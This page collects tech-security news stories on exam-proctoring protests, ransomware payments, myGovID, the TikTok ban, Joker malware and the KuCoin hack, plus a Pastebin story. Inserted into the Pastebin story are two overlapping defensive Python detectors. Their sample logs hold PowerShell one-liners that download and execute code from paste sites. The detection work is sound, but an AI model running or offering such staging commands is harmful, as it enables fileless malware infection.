More stories


    Students rise up against forced remote spy app usage in colleges, universities

    As the COVID-19 pandemic continues to disrupt the education system, students are fighting back against the remote methods employed by some colleges to keep an eye on their activities during assessments. 

    Due to stay-at-home and lockdown orders, teachers and students worldwide were required to pivot to remote learning systems and platforms. Without warning, teachers found themselves trying to engage pupils over Zoom; online libraries and research platforms replaced traditional, brick-and-mortar buildings, and the parents of younger students found themselves balancing work from home and entertaining their kids. 
    For many governments, now, keeping kids in school is a top priority — not only for their education but also to free up parents to go back to work. 
    See also: Students, university clash over forced installation of remote exam monitoring software on home PCs
    As college and university students head to campus for the new term, just as cold and flu season begins, COVID-19 outbreaks are also occurring.
    Despite social distancing efforts, thousands of confirmed and suspected cases at US campuses have prompted local lockdowns and students are being told to self-isolate.
    In the UK, mere days after welcoming a new wave of students, 32 universities recorded positive cases, including the University of Kent at Canterbury, the University of Glasgow, and Manchester Metropolitan University. In the latter case, students have called imposed lockdowns a form of “false imprisonment.”
    The escalating situation may see many students — whether or not they are in college accommodation — return to online-only teaching. However, this has now become a minefield for privacy. 
    Back in August, ZDNet reported protests organized by Australian National University (ANU) students against the enforced download of Proctorio, a remote monitoring tool, on personal devices. 
    Proctorio is a “secure remote exam” solution for invigilating exams remotely, including features such as microphone and camera monitoring, as well as eye-tracking to flag any behavior deemed suspicious. 
    ANU students consider Proctorio an affront to their personal privacy — and one that “crosses the line” as the software was loaded on home PCs, rather than electronics belonging to the university and provided to exam takers. 
    This form of activism against surveillance and exam monitoring tools — also known as proctoring software — adopted by colleges is taking shape worldwide, and it is one that academic institutions should watch closely. 
    An investigation into student activity in this arena, conducted by digital rights group the Electronic Frontier Foundation (EFF), has found dozens of similar petitions and protests. 
    Across the globe, students are rising up against the forced use of proctoring software; not only Proctorio but also other variations such as Honorlock and ProctorU. Some of the most noteworthy petitions are below:
    University of Texas at Dallas: Students are asking for the removal of Honorlock, claiming the software is a “blatant violation of our privacy as students and infeasible for many.”
    California State University Fullerton: Proctorio is at the heart of the conflict here, with students saying, “we believe it is unacceptable in any circumstance for the university to track our keystrokes, access our computers’ cameras, film us in our homes, and use AI technology to determine we look ‘suspicious.’”
    Miami University: Students call Proctorio “inherently ableist and discriminatory,” highlighting concerns with racial bias and exam takers with conditions such as ADHD potentially being labeled as moving suspiciously.
    Auburn University: Students describe proctoring software as “legitimized spyware.”
    The City University of New York: Students successfully reached over 27,000 signatures, ending the compelled use of proctoring software.
    Change.org reveals other petitions worldwide, ranging from colleges in Sri Lanka to the UK, Canada, and Italy. 
    Schools, colleges, and universities are in an unenviable position. They have been thrust into a world in which they are responsible for pupil education but must rely on remote technology to deliver it, and they must also work out ways to monitor assessments and exams fairly to reduce the risk of cheating. 
    However, with disruption unlikely to end for the educational sector any time soon, educational and social policy should not disregard an individual’s right to privacy, and it should not become a common and accepted fact of life to have remote surveillance tools installed on personal devices in order to have an academic career.
    Security concerns must be addressed, proctoring software needs to be transparent and its use temporary, and the forced installation of what amounts to spyware on devices that belong to students rather than educational institutions needs to be dealt with, and quickly.  
    “While almost all the petitions we’ve seen raise very real privacy concerns — from biometric data collection to the often overbroad permissions these apps require over the students’ devices, to the surveillance of students’ personal environments — these petitions make clear that proctoring apps also raise concerns about security, equity, accessibility, cost, increased stress, and bias in the technology,” the EFF says. 
    ZDNet has reached out to the proctoring software providers mentioned and will update when we hear back. 



    Ransomware is your biggest problem on the web. This huge change could be the answer

    Police always advise ransomware victims against paying off the criminal gangs that have encrypted their computer systems – and there are many good reasons for that.
    At the most basic level, even after the companies have handed over the money, it’s not always certain they will get their data restored. They are negotiating with crooks after all.

    But even if they do get their data back, paying up is still a bad idea. It gives the crooks a big payday, which encourages further attacks – perhaps even on the same organisation again. And that big payoff means that gangs can invest in hiring more software developers and hackers to go after even bigger targets.
    Paying the ransom might save you pain in the short term but means a bigger problem for everyone else in the longer run.
    Currently, businesses in the UK are unlikely to be prosecuted for paying up to a ransomware gang – unless there is a reasonable chance of the payment being used to fund terrorism. But at least one senior figure in the security industry thinks that it should be a lot harder, or even illegal, to pay ransoms.
    In a speech earlier this month at security think tank RUSI, former head of the National Cyber Security Centre (NCSC) Ciaran Martin explained just how big a problem the agency considers ransomware to be.
    “Right up until my final hours at NCSC last month, I remained of the view that the most likely cause of a major incident was a ransomware attack on an important service,” he said.
    “For the attacker, the choice of the service would be incidental. They were just after money. But from the point of view of national harm, that incidental choice of victim could be important. What most kept me awake at night was the prospect of physical harm inadvertently resulting from ransomware.”
    He added: “Criminal ransomware used recklessly by amoral criminals is one of the biggest but least discussed scourges of the modern internet.”
    Martin said if he had “one policy card to play in the next year”, he would ask for “a serious examination of whether we should change the law to make it illegal for organisations in the UK to pay ransoms in the case of ransomware”.
    “The case for doing so is not – and I stress is not – a slam dunk, and if the answer is no [to making paying ransoms illegal], we should think of something else to counter ransomware, because it’s the single biggest contemporary scourge in cyberspace right now.”
    Martin said it was a curious anomaly that UK extortion laws are largely based on the experience of kidnapping by terrorist groups. That is, if you are ransomwared by a proscribed terrorist group, it is illegal to pay, but if the attackers are ordinary criminals, or even state attackers, then it’s fine. “Surely that needs a look,” he said.
    It’s thought that as many as half of organisations pay up when hit with ransomware, which has made data-encrypting malware a major source of revenue for sophisticated criminal gangs. Some versions of ransomware have raked in tens of millions in ransom, usually in the form of hard-to-trace cryptocurrencies like bitcoin.
    Many victims feel they have little choice but to pay up if the alternative is rebuilding all their computer systems and databases effectively from scratch – and trying not to go out of business as they do it. 
    But critics have warned being able to pay the ransom means that ransomware attacks are viewed by some as just another cost of doing business, which means they are less likely to invest in the sometimes-costly security systems that would prevent such attacks.
    If paying the ransom were no longer a legal option, companies would have to make sure their systems were robust enough to stop the attackers in the first place. But it would also put much more pressure on police to track down gangs as well.


    ATO wants to verify citizens are alive and physically present for myGovID registrations

    The Australian Taxation Office (ATO) is looking to introduce a “liveness” feature to myGovID, the Australian government’s digital identity credential.
    The agency, which handles myGovID, has gone to market seeking a supplier to deliver a software solution that will allow people who are registering to prove they are a live person and physically present, as well as allow them to take a selfie to verify their identity against a stored identity document, such as their passport or driver’s licence.
    The ATO quietly released the app last year to enable citizens to have their identity verified once so they could access government services online using their verified identity, rather than having to continually be verified by each Commonwealth entity.
    The ATO emphasised that the successful contractor would need to adhere to strict security guidelines. These include delivering security management and governance functionality in accordance with the Australian Cyber Security Centre (ACSC) Information Security Manual and the Essential Eight mandatory requirements, providing authenticated log-on for individual ATO users, and configuring its IT systems and environments to respond effectively to the latest threats.
    Additionally, the ATO said the supplier must utilise securely configured cryptographic data transmission protocols and algorithms to transfer information across untrusted networks, and be able to control the connection of peripheral devices to IT systems that store, process, or transfer ATO information.
    See also: Australian Taxation Office happy to go it alone with cybersecurity
    Last week, it was revealed that the default login option on myGovID, as used by ATO agents, was vulnerable to a code replay attack.
    In a blog post, security researchers Ben Frengley and Vanessa Teague described how an attacker could use a malicious login form to capture user details, which the attacker could then use to log in to other accounts held by the myGovID user.
    The pair said they informed the Australian Signals Directorate of the issue on August 19, and were told by the ATO that “they did not intend to change the protocol, at which point we immediately informed them that we would make a warning to users public”.
    A spokesperson for the ATO said the flaw was not a “security vulnerability of the myGovID solution or application” and that it can be used against login procedures including “passwords, SMS, physical code generators, and mobile apps codes”.
    “The approach identified by the researchers, to scam a user by redirecting them to a malicious phishing website requesting credentials, is a well-known and common challenge across authentication systems and is not unique to the myGovID platform,” the spokesperson said.
    “The ATO takes IT security very seriously.”
    In October, the Digital Transformation Agency said almost 7,000 Australians had created a myGovID.
    The ATO said it expected approximately five million Australians would sign up over the first three years of the myGovID app going live.
    As part of the selection process, the tax office said it plans to conduct software trial activities to ensure shortlisted tenderers meet its requirements.
    The contract will be for a period to 30 September 2021, with the option to extend it three times for up to two years per extension.
    Submissions for the tender close on October 20. 
    Related Coverage
    More privacy conscious and not Australia Card 2.0: DTA defends digital identity play
    The agency spent its entire Senate Estimates appearance explaining what exactly is digital identity and why Australians don’t really know about its existence.
    Canberra wants to open digital identity system to commercial sector
    The federal government has opened discussions on how the commercial sector can participate in Australia’s digital identity system.
    Nearly 7,000 Australians have created a myGovID
    By the end of 2018-19, the Digital Transformation Agency said there had been 11,785 downloads of its myGovID iOS smartphone app.


    US federal judge blocks TikTok ban

    A federal judge has ordered an injunction against the Trump administration’s ban of TikTok, which was set to come into effect on Sunday. 
    The ruling was in relation to a lawsuit filed by TikTok that argued the ban undermined the free speech rights of US citizens.
    “To ensure that the rule of law is not discarded, and that our company and users are treated fairly, we have no choice but to challenge the executive order through the judicial system,” TikTok said in its originating motion.
    The ban had sought to block TikTok and WeChat as well as remove them from the Apple and Google app stores. Additionally, updates to the existing apps would have also been banned. 
    The ban would not have prevented existing users from using the apps, however, as long as the apps were already installed prior to the app store removals.
    Following the judge’s order, the US Commerce Department, which is responsible for enforcing the ban, issued a statement that said it would “vigorously defend” the ban from legal challenges.
    Last week, a US court issued a similar nationwide injunction against President Donald Trump’s executive order, preventing a WeChat ban from coming into effect. 
    In that case, magistrate judge Laurel Beeler granted the injunction because the plaintiffs had shown serious questions about whether the ban impinged on the First Amendment. She also acknowledged that the ban would cause hardship for the plaintiffs, as it would shut down the primary means of communication for the Chinese community.
    The TikTok ban was initially scheduled for September 20, but the US Commerce Department delayed it by a week to September 27 due to “recent positive developments” in talks regarding the sale of the US operations of TikTok. 
    Earlier this month, Oracle and Walmart announced they would acquire 20% of a newly formed TikTok Global and issue an IPO within 12 months, effectively saving TikTok’s US footprint from being banned.        
    The US Commerce Department also has a second TikTok ban on the cards. This second ban has a deadline of November 12 and demands that ByteDance sell TikTok because of national security concerns. It was not part of the injunction ordered on Sunday evening.
    Both of these bans are the official instruments for enforcing the two executive orders that were signed by President Donald Trump in early August, which had labelled the pair of Chinese apps as national security threats. 
    Related Coverage
    US district court blocks Trump’s WeChat ban
    The presiding judge granted the motion to block the ban as there is ‘scant little evidence’ that it effectively addresses national security concerns.
    TikTok to sue US government over ban
    Chinese mobile app maker has confirmed plans to “challenge” the Trump administration’s August 6 executive order “through the judiciary system”, though, any lawsuit will not stop its forced sale in the US market.
    What TikTok’s big deal means for cloud, e-commerce: TikTok Global created with Oracle, Walmart owning 20%
    Oracle and Walmart team up on TikTok’s US operations with an IPO within a year. Oracle lands its cloud customer in TikTok and Walmart eyes e-commerce.
    You can bypass TikTok’s MFA by logging in via a browser
    Enabling MFA in the TikTok mobile app doesn’t apply it for the web dashboard. TikTok promised to fix the issue.
    Microsoft out of race to purchase TikTok as US ban draws near
    Oracle reported as being the controversial app’s new ‘trusted tech partner’.
    How the TikTok deal still poses pitfalls (TechRepublic)
    A deal that would see a new TikTok Global entity owned partly by Oracle and Walmart may still trigger national security concerns.


    Singapore urges need for international organisations to 'reform' in digital age

    Singapore has called on global organisations such as the United Nations (UN) and World Trade Organisation (WTO) to reform, so that international rules are in line with cybersecurity and other key digital developments. The Asian nation also underscored the need for unified cooperation against COVID-19, which it noted has accelerated “self-defeating” sentiments worldwide, including protectionism and xenophobia. 
    Continued international cooperation was key to overcoming the impact of the pandemic as well as to rebuilding, and nations needed to build greater trust and learn from each other, said Singapore’s Minister for Foreign Affairs Vivian Balakrishnan, in the country’s national statement at the UN General Assembly’s General Debate of the 75th session held Saturday. 
    Delivered via video message, Balakrishnan said in his speech: “The world is facing a period of prolonged turmoil. The multilateral system is confronted by nationalism, xenophobia, the rejection of free trade and global economic integration, and the bifurcation of technology and supply chains. 

    “But, these threats are not new. COVID-19 has, in fact, accelerated and intensified these pre-existing trends. Protectionism and unilateral action will ultimately be self-defeating,” the minister said.
    He noted that modern supply chains were complex, where it was difficult to locally produce all key items since materials and expertise from elsewhere always would be needed at various steps of the process. This was reflected in the disruptions many countries experienced in the flow of essential goods during lockdowns.
    Bifurcation also reduced the global pool of knowledge as well as opportunities for sharing the benefits of research and innovation. Because countries had been open to sharing scientific knowledge, Balakrishnan noted, test kits could be produced quickly during the early phase of the current pandemic. The same global cooperation was now essential in the development of a vaccine to ensure equitable and universal access, he said. 
    He added that global trust would be eroded if contractual obligations for the export of critical goods and movement of people were breached. 
    He further underscored the need for the rules-based multilateral system to be reformed, so that it was “fit for purpose” and able to adapt to the changing realities of today. 
    Apart from the need to work together towards a COVID-19 vaccine and to rebuild communities, Balakrishnan urged for continued efforts to address challenges posed by the digital revolution, cybersecurity threats, climate change, and transboundary pollution.
    “We must harness new digital technology for the benefit of all our societies whilst mitigating the possible negative impact,” he said. “COVID-19 has accelerated the deployment of artificial intelligence, robotics, digital payments, e-government services, and remote work.”
    Globally, governments, businesses, and individuals needed to be able to transact and transfer data securely across borders. This stressed the need for the world to develop a “trusted, open, and inclusive cyberspace” underpinned by international law and norms of responsible state behaviour, the minister said. In this aspect, he noted, Singapore supported the UN Secretary-General’s Roadmap for Digital Cooperation. 
    He further urged that international institutions remain inclusive and transparent.
    The UN’s role, for instance, was critical, but the 75-year-old organisation itself needed to “adapt and reform” so it could respond effectively to current and future challenges, and remain relevant for the next 75 years.
    The same was true for the WTO, he added. Noting that the international trade organisation’s rules were designed for an agricultural and manufacturing-based world economy, he said WTO today was in urgent need of reform. 
    Balakrishnan said: “The world needs appropriate rules for services, especially digital services and intellectual property, in preparation for this digital age that is unfolding in front of us.”
    He stressed that an open, rules-based multilateral trading system was a foundation for sustainable global recovery and had enabled countries to trade in goods and services in mutually beneficial ways. Post-pandemic, nations must look to further strengthen this system so it could work better for the future. 
    “International governance, now more than ever before, needs to be more representative, more inclusive, and more open. We need to take into account a wide spectrum of views and do more to acknowledge the rich diversity of our global community,” the Singapore minister said. 


    Google removes 17 Android apps doing WAP billing fraud from the Play Store

    This week Google removed 17 Android applications from the official Play Store. The apps, spotted by security researchers from Zscaler, were infected with the Joker (aka Bread) malware.
    “This spyware is designed to steal SMS messages, contact lists, and device information, along with silently signing up the victim for premium wireless application protocol (WAP) services,” Zscaler security researcher Viral Gandhi said this week.
    The 17 malicious apps were uploaded to the Play Store this month and did not get a chance to gain a large following, having been downloaded just over 120,000 times before being detected.
    The names of the 17 apps were:
    All Good PDF Scanner
    Mint Leaf Message-Your Private Message
    Unique Keyboard – Fancy Fonts & Free Emoticons
    Tangram App Lock
    Direct Messenger
    Private SMS
    One Sentence Translator – Multifunctional Translator
    Style Photo Collage
    Meticulous Scanner
    Desire Translate
    Talent Photo Editor – Blur focus
    Care Message
    Part Message
    Paper Doc Scanner
    Blue Scanner
    Hummingbird PDF Converter – Photo to PDF
    All Good PDF Scanner
    Following its internal procedures, Google removed the apps from the Play Store and used the Play Protect service to disable the apps on infected devices, but users still need to manually remove the apps from their devices.
    Joker is the Play Store’s bane
    This recent takedown also marks the third such action from Google’s security team against a batch of Joker-infected apps in the past few months.
    Google removed six such apps at the start of the month after they were spotted and reported by security researchers from Pradeo.
    Before that, in July, Google removed another batch of Joker-infected apps discovered by security researchers from Anquanke. This batch had been active since March and had managed to infect millions of devices.
    The way these infected apps usually manage to sneak their way past Google’s defenses and reach the Play Store is through a technique called “droppers,” where the victim’s device is infected in a multi-stage process.
    The technique is quite simple, but hard to defend against, from Google’s perspective.
    Malware authors begin by cloning the functionality of a legitimate app and uploading it on the Play Store. This app is fully functional, requests access to dangerous permissions, but also doesn’t perform any malicious actions when it’s first run.
    Because the malicious actions are usually delayed by hours or days, Google’s security scans don’t pick up the malicious code, and Google usually allows the app to be listed on the Play Store.
    But once on a user’s device, the app eventually downloads and “drops” (hence the name droppers, or loaders) other components or apps on the device that contain the Joker malware or other malware strains.
    The Joker family, which Google tracks internally as Bread, has been one of the most ardent users of the dropper technique. This, in turn, has allowed Joker to make it onto the Play Store, the holy grail of most malware operations, more often than many other malware groups.
    In January, Google published a blog post where it described Joker as one of the most persistent and advanced threats it has dealt with in the past years. Google said that its security teams had removed more than 1,700 apps from the Play Store since 2017.
    But Joker is far more widespread than that, being also found in apps uploaded on third-party Android app stores as well.
    All in all, Anquanke said it detected more than 13,000 Joker samples since the malware was first discovered in December 2016.
    Protecting against Joker is hard, but if users show some caution when installing apps with broad permissions, they can avoid getting infected.
    In other Android security news
    Bitdefender reported a batch of malicious apps to Google’s security team. Some of these apps are still available on the Play Store. Bitdefender didn’t reveal the name of the apps, but only the names of the developer accounts from which they were uploaded. Users who have installed apps from these developers should remove them right away.
    Nouvette
    Piastos 
    Progster 
    imirova91 
    StokeGroove 
    VolkavStune 
    ThreatFabric also published a report about the demise of the Cerberus malware and the rise of the Alien malware, which contains features to steal credentials for 226 applications.


    KuCoin cryptocurrency exchange hacked for $150 million

    Singapore-based cryptocurrency exchange KuCoin today disclosed a major hack. In a statement posted on its website, the company confirmed that a threat actor breached its systems and emptied its hot wallets of all funds.
    Hot wallets are cryptocurrency management apps that are connected to the internet. Cold wallets are stored offline.
    Cryptocurrency exchanges like KuCoin use hot wallets as their temporary storage systems for assets that are currently being exchanged on the platform, and they are used to power conversion operations and funds transfers.
    KuCoin said it detected the hack after observing “some large withdrawals” from its hot wallets on September 26.
    The company said it started a security audit and discovered the missing funds. KuCoin said the hacker managed to steal Bitcoin assets, ERC-20-based tokens, along with other types of tokens.
    Currently, the loss is estimated at a minimum of $150 million, based on an Ethereum address where users tracked some of the stolen funds.
    KuCoin has not returned an additional request for comment.
    However, KuCoin CEO Johnny Lyu is scheduled to provide additional details about the security breach in a live stream at 12:30 (UTC+8), September 26, 2020.
    KuCoin also promised to reimburse users who lost funds in the hack using its cold wallets. Deposits and withdrawals have been temporarily suspended while the company’s security team investigates the incident.


    Pastebin adds 'Burn After Read' and 'Password Protected Pastes' to the dismay of the infosec community

    Pastebin, the most popular website where users can share small snippets of text, has added two new features today that cyber-security researchers believe are going to be widely and wildly abused by malware operators.
    Named “Burn After Read” and “Password Protected Pastes,” the two new features allow Pastebin users to create pastes (pieces of text) that expire after a single read or pastes that are protected by a password.
    Neither feature is original; both have been present on other paste sites for years.
    However, they are new to Pastebin, which is, by far, today’s most popular pastes portal, being ranked in the Alexa Top 2,000 most popular sites on the internet.
    Pastebin has been abused in malware operations
    As with anything popular, this has also attracted a lot of bad content hosted on the platform. While some people use it to host pieces of code or text they want to share with a colleague, over the past decade Pastebin has also turned into a de facto hosting service for malicious code.
    Across the years, malware authors have used Pastebin to store malicious commands that they retrieve and run on infected hosts, hacked data, IP addresses for malware command and control servers, and many other operational details.
    Ted Samuels, an incident response (IR) consultant, told ZDNet today that it’s hard to put a number or percentage on Pastebin’s presence in malware operations, but described it as “not uncommon.”
    “Pastebin is by far the most prolific ‘paste site’ and fairly popular staging ground for fileless attacks using PowerShell. For example, a threat actor’s initial payload may use PowerShell to download additional (and often obfuscated) content from pastebin.com for further execution via PowerShell. The prolific CobaltStrike framework can be loaded this way.”
    To counteract Pastebin’s rising popularity among malware devs, throughout the years, cyber-security companies have created tools that scrape new Pastebin entries to search for malicious or sensitive-looking content as soon as it’s uploaded on the site. These malicious pastes are indexed in private threat intel databases that are later used for incident response, and are also reported to Pastebin to have them taken down.
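    The staging pattern Samuels describes, and the scraping tools built to catch it, point to a check responders also run on the endpoint side: looking through process-creation logs for PowerShell that fetches a paste. The following is an added example, not code from the article, from Pastebin or from any vendor quoted here. It flags PowerShell command lines that pull content from pastebin.com, including the -EncodedCommand form, which hides the URL behind UTF-16LE base64 and so defeats a plain string match. The log lines, paste IDs and regex heuristics are constructed for illustration and are not real indicators.

```python
"""Flag PowerShell command lines that stage a payload from pastebin.com.

Added example; the sample log lines, paste IDs and heuristics below are
constructed for illustration, not taken from a real incident.
"""
import base64
import binascii
import re

# A pastebin.com URL, with or without the /raw/ prefix (paste IDs are 8 chars).
PASTEBIN_URL = re.compile(
    r"https?://(?:www\.)?pastebin\.com/(?:raw/)?[A-Za-z0-9]{8}", re.I
)
# Cues that content is being fetched and/or executed, not merely referenced.
DOWNLOAD_CUES = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b"
    r"|Invoke-RestMethod|\birm\b|Invoke-Expression|\biex\b|Net\.WebClient",
    re.I,
)
# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(
    r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I
)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if absent/undecodable.

    PowerShell expects the blob to be base64 over UTF-16LE text.
    """
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return ""


def analyse(cmdline: str) -> dict:
    """Describe one command line: pastebin URLs seen, whether a fetch/exec cue
    is present, and whether the URL only became visible after decoding."""
    decoded = decode_encoded_command(cmdline)
    plain_urls = PASTEBIN_URL.findall(cmdline)
    decoded_urls = PASTEBIN_URL.findall(decoded)
    combined = cmdline + " " + decoded
    return {
        "urls": sorted(set(plain_urls + decoded_urls)),
        "download_cue": bool(DOWNLOAD_CUES.search(combined)),
        "hidden_by_encoding": bool(decoded_urls) and not plain_urls,
    }


def is_pastebin_staging(cmdline: str) -> bool:
    """True only when a pastebin URL co-occurs with a fetch/exec cue; a bare
    URL (e.g. a browser opening a paste) is not enough to alert on."""
    result = analyse(cmdline)
    return bool(result["urls"]) and result["download_cue"]


def scan(lines):
    """Return (index, analysis) for every line that looks like paste staging."""
    return [(i, analyse(line)) for i, line in enumerate(lines) if is_pastebin_staging(line)]


# Constructed sample CommandLine fields, as a process-creation log might carry them.
_HIDDEN_PAYLOAD = (
    "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/Zz9yX1qW')"
)
_ENCODED = base64.b64encode(_HIDDEN_PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_LOGS = [
    # 0: classic fileless stager, URL in the clear
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
    ".DownloadString('https://pastebin.com/raw/AbCdEfGh')\"",
    # 1: same stager, URL hidden inside -EncodedCommand
    f"powershell.exe -NoP -NonI -W Hidden -EncodedCommand {_ENCODED}",
    # 2: benign admin script, must not alert
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    # 3: a user merely opening a paste in a browser, must not alert
    "chrome.exe https://pastebin.com/AbCdEfGh",
]

if __name__ == "__main__":
    for idx, info in scan(SAMPLE_LOGS):
        print(f"[!] line {idx}: {info}")
```

    The URL-plus-cue rule is deliberately conservative: a pastebin link on its own is common in legitimate activity, and alerting on it alone would bury the staging cases. The decode step matters because the encoded form is what most commodity stagers actually use; a scraper watching Pastebin itself would see the paste, but once the paste is password-protected or burned after one read, the command line on the host may be the only artefact left.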
    But now, security researchers argue that by adding the two new features today, Pastebin is blocking their good-will efforts to detect malware operations and is catering more to the malware crowd rather than actual users and the good guys.
    “Unless they’re taking measures that aren’t immediately apparent to prevent the use of Burn After Reading and Password Protection for C2 and malware staging, those would seem to be pretty helpful new features for attackers who use PasteBin for those ends,” Brian, a security researcher from Pittsburgh, told ZDNet.

    I can already see how this is going to be abused by threat actors. Going to make tracking these threats 100x harder. Who is pastebin working for? Security or threat actors? https://t.co/wX088qpX7Z
    — Jake (@JCyberSec_) September 25, 2020

    But the impact of the new features goes beyond detecting what was uploaded to the site in real time; they also affect post-infection IR investigations.
    “This new change will now make it harder for incident responders to quickly evaluate what may have been downloaded and executed in some environments,” Samuels told ZDNet.
    Long-time bad blood
    But the acidic reaction towards Pastebin’s two new features today is also because of the cyber-security community’s rocky relationship with the site.
    Across the years, security researchers have often accused its admins of dragging their feet when asked to take down malicious pastes. Things got very heated earlier this year, in April, when Pastebin wanted to discontinue the Scraping API, a tool cyber-security researchers were using to detect new content being uploaded to Pastebin.
    Pastebin backtracked on the change after massive backlash and media coverage.
    It is unclear what Pastebin thinks of the cyber-security community’s latest reaction to its newest features, but in an email, the company said it added “Burn After Read” and “Password Protected Pastes” at the request of its users.
    “Pastebin stores important data for our users starting from calculations and engineering data, such as algorithms, logs from various services, robots, network devices and ending with proprietary software code,” the company said.
    “We have received many requests from our users to implement these features because of their privacy rights, and to help our users protect their work.”
    “Pastebin was created by developers for developers, and is used globally by millions. Of course, every platform has bad actors that try to take advantage, including Github, Twitter, Facebook, Dropbox, Privnotes & Sendspace to name a few,” Pastebin said.
    As Pastebin pointed out, cyber-security researchers may also be overreacting, as there are dozens of other paste sites like Pastebin around, some of which are even more lenient towards allowing abuse on their platforms when compared to Pastebin.
    “Of course there is some overreaction from infosec Twitter, and it’s not just Pastebin. There are many paste sites with similar functionality, postb.in for example,” Samuels said.
    Keeping sites like Pastebin accountable for the features they support is necessary, but the two new features also have legitimate uses. If Pastebin is truly so bad, then other actions should have been taken years ago.
    “Pastebin and other paste websites should be blocked inside company networks,” SwitHak, a security researcher from France, told ZDNet.
    “We know that it is used by bad guys. We need to act in consequence.
    “We know the vector, let’s burn it and force attackers to use their own servers. If they host the malware configuration on their own servers, we can burn the attackers’ infrastructure. It’s about making the attack more complicated for the attackers, forcing them to play in our field and imposing cost,” SwitHak added.
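    One defender-side check that follows from the staging pattern Samuels describes and the block list SwitHak recommends, written here as an added example (not code from ZDNet, Pastebin or any of the researchers quoted): it scans constructed PowerShell command-line log entries for download primitives that point at paste-site domains, expanding -EncodedCommand so an obfuscated one-liner is not missed. The domain list, the regexes and the sample log lines are assumptions; the URL paths are placeholders.

```python
import base64
import re

# Paste-site domains named in the article; extend for your environment (assumption).
PASTE_SITE_DOMAINS = {"pastebin.com", "postb.in"}

# PowerShell download / execution primitives typical of fileless staging one-liners.
DOWNLOAD_PATTERN = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|"
    r"Net\.WebClient|Invoke-Expression|IEX)\b", re.IGNORECASE)
URL_PATTERN = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
ENCODED_PATTERN = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def is_paste_site(host):
    """True for a listed paste-site domain or any of its subdomains (e.g. raw.pastebin.com)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in PASTE_SITE_DOMAINS)

def decode_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so hidden URLs surface."""
    m = ENCODED_PATTERN.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16; fall back to the raw command line

def flag_paste_site_download(cmdline):
    """Return sorted paste-site hosts fetched by a download primitive, or [] if none."""
    expanded = decode_encoded_command(cmdline)
    if not DOWNLOAD_PATTERN.search(expanded):
        return []
    return sorted({h.lower() for h in URL_PATTERN.findall(expanded) if is_paste_site(h)})

# Constructed sample process command lines (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_LOG = [
    "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')",
    "powershell.exe -EncodedCommand " + base64.b64encode("iwr https://postb.in/PLACEHOLDER | iex".encode("utf-16-le")).decode(),
    "powershell.exe -c Get-Content C:\\Users\\a\\notes.txt",
    "powershell.exe -c Invoke-WebRequest https://example.com/update.zip -OutFile u.zip",
]

def scan(lines):
    """Return (command line, hosts) for every entry that stages content from a paste site."""
    return [(line, hosts) for line in lines if (hosts := flag_paste_site_download(line))]

if __name__ == "__main__":
    for line, hosts in scan(SAMPLE_LOG):
        print(f"ALERT paste-site staging via {hosts}: {line[:60]}...")
```

    Because a burn-after-read paste may be gone by the time an investigation starts, the logged command line is often the only record of what was fetched, which is why the match is kept alongside the host list.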

    However, Pastebin says that while the two new features might be abused, the company also has features to help the good guys.
    Earlier this year, we introduced the new Enterprise API subscription to provide better data subscription for our business customers.
    Partnered with global cyber security companies for the protection of our site as well as enriching the data of their products and services.
    Partnered with global CERTs (Computer Incident Response Center Luxembourg, Canadian Centre for Cyber Security, Austrian Energy CERT) and law enforcement agencies.
    Internally, as it relates to malicious content, in partnership with the organizations mentioned above, we take proper actions in mitigating these data.
    For researchers, academia and industry organizations approved by us, we grant this access at no cost.
    Lastly, implementation of Abuse Management and Threat Analysis teams who work closely with law enforcement and industry partners.
    Updated with comments from Pastebin, as they arrived post publication.